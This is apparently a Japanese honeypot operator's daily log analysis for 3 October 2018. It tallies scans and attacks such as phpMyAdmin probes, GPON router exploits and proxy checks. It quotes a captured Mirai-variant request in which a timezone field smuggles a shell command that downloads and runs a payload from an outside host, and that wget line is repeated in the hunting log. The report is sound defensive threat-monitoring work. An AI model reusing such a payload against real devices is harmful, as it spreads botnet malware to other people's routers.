ハニーポットのログ分析(2018/10/03)
WOWhoneypotの2018/10/03(水) (運用120日目)の簡易分析です。
本日の総アクセス件数は 57件です。
気になるアクセスは以下です。
・(新規)「HEAD /icons/apache_pb.gif」Apacheサーバの調査:1件
・Mirai亜種
→以下のようなアクセスです。
POST / HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Hello-World
Connection: keep-alive<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>set_time_config</methodName><params><param><value><struct><member><name>timezone</name><value><string>"`cd /tmp; wget hxxp://68.183.28[.]29/juno -O -> /tmp/jno; sh /tmp/jno sonicwall; rm -rf /tmp/jno`"</string></value></member></struct></value></param></params></methodCall>
取得するファイルは以下です。
https://urlscan.io/result/738ba824-7056-4062-b780-093cd207e96c
以下が全アクセスログです。
件数 | 日付 | 種別 | リクエスト |
36 | 2018-10-03 | アクセス | GET / |
2 | 2018-10-03 | Mirai亜種 | POST / |
2 | 2018-10-03 | 不正中継の調査 | GET hxxp://www.ip.cn/ |
2 | 2018-10-03 | 不正中継の調査 | GET hxxp://www.123cha.com/ |
2 | 2018-10-03 | 不正中継の調査 | GET hxxp://112.35.63.31:10083/index.php |
2 | 2018-10-03 | 不正中継の調査 | CONNECT cn.bing.com:443 |
1 | 2018-10-03 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?style/ |
1 | 2018-10-03 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?images/ |
1 | 2018-10-03 | Apacheサーバの調査 | HEAD /icons/apache_pb.gif |
1 | 2018-10-03 | 脆弱性スキャンツールZmEuによる調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
1 | 2018-10-03 | クローリング | GET /robots.txt |
1 | 2018-10-03 | phpMyAdminの調査 | GET /pma/scripts/setup.php |
1 | 2018-10-03 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/setup.php |
1 | 2018-10-03 | phpMyAdminの調査 | GET /phpmyadmin/scripts/setup.php |
1 | 2018-10-03 | phpMyAdminの調査 | GET /MyAdmin/scripts/setup.php |
1 | 2018-10-03 | phpMyAdminの調査 | GET /myadmin/scripts/setup.php |
1 | 2018-10-03 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
本日のドメイン名でのアクセスは以下です。
3 GET /
1 GET /robots.txt
本日のハンティングログは以下です。
2 2018-10-03 wget hxxp://68.183.28.29/juno
以上です。